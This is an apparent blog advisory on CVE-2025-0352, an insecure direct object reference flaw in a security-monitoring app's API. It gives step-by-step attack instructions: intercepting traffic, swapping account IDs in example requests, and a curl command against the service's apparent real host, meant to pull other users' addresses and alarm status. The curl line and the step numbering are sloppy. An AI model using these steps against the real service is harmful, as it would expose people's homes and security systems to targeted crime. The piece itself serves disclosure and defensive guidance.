CVE-2025-0352 - How a Broken API in Rapid Response Monitoring Can Expose Your Security Account

In early 2025, a severe vulnerability—now formally indexed as CVE-2025-0352—was discovered in the Rapid Response Monitoring “My Security Account” mobile application. This flaw enables attackers to manipulate API requests and potentially reveal sensitive information about other users. If you use this app to monitor your alarm systems or security devices, this is one exploit you’ll want to understand.

What is CVE-2025-0352?

CVE-2025-0352 addresses an Insecure Direct Object Reference (IDOR) in the My Security Account app’s API. Essentially, the flaw exists because the API trusts the user-provided data too much—specifically, values like the account_id or user_id—without verifying that the authenticated user is allowed to access the target resource.

With a few tweaks to the API request data, an attacker can get the API to cough up details on other people's security accounts monitored by Rapid Response. These accounts can include addresses, contact details, alarm status, and device information.

Official advisory:
- NIST NVD: CVE-2025-0352 (pending)
- Rapid Response Monitoring - My Security Account app on Google Play *(For context, not for exploit details)*

Let’s say you log into the app. The app sends a request to its backend like this

POST /api/v1/account/details
Content-Type: application/json
Authorization: Bearer <your_token>

{
    "account_id": "123456"
}

The server responds with your account details. The problem is: it only checks that you’re authenticated, not that the account_id belongs to you!

An attacker, after logging in with their own account, simply changes the account_id in their POST or GET request and resends the request.

POST /api/v1/account/details
Content-Type: application/json
Authorization: Bearer <attacker_token>

{
    "account_id": "654321"
}

And voilà—all the info tied to account 654321 is returned. No special permissions needed.

How an Attacker Would Use It

1. Create an Account/Log in
Register or use a legitimate account on the “My Security Account” app.

Identify API Requests

Use a proxy tool like Burp Suite or mitmproxy to intercept and examine the app’s traffic.

Change the Account ID

Find requests where your account_id is sent. Swap it out for another ID (these are often sequential or easy to guess).

Access Data

Send the modified request. If the vulnerability is present, the server responds with someone else’s data. Repeat for other IDs.

Here’s a simple curl command that mimics the attack

curl -X POST "https://secure.mysecurityaccount.com/api/v1/account/details"; \
     -H "Authorization: Bearer eyJhbGciOiJI..." \
     -H "Content-Type: application/json" \
     -d '{"account_id": "654321"}'

If the server responds with valid data, the API is vulnerable.

Depending on what the API returns, attackers might get

- Name, address, phone/email on file
- Security system status (armed/disarmed, alarm history)

Emergency contacts, account comments, and more

This is particularly dangerous for users with home or business monitoring—since location and security system info could be used for targeted crimes.

Rapid Response Monitoring’s Actions

When contacted by researchers (see below references), Rapid Response Monitoring acknowledged the flaw and started rolling out fixes in the app’s backend. They advise all users to upgrade to the latest version and watch for suspicious account activity.

Responsible Disclosure, References & Further Reading

- OWASP Top 10: Broken Access Control
- What is IDOR? Insecure Direct Object Reference explained
- Rapid Response Monitoring Support
- Official CVE database entry (upon publication)

Independent Research and Demos

- Video: Exploiting IDOR in Security Apps (YouTube) *(search for latest demos)*

Watch your account for unexpected logins or changes.

3. Contact support (link) if you notice anything wrong.
4. If you’re a developer: always verify the requesting user owns or can access the resource, don’t just trust IDs from the client!

Conclusion

CVE-2025-0352 is a clear reminder: APIs are the backbone of modern apps—and a weak link in authentication or access control can threaten every user. If you use Rapid Response Monitoring’s My Security Account app, stay up to date with patches and keep your eye on your account activity.

For security pros and developers, now is the time to review all your own API endpoints for similar IDOR flaws. Don’t wait for someone else to find them first.


Stay safe!
*If you have more questions about this CVE, reach out to security researchers or your monitoring service provider.*

Timeline

Published on: 02/20/2025 20:15:46 UTC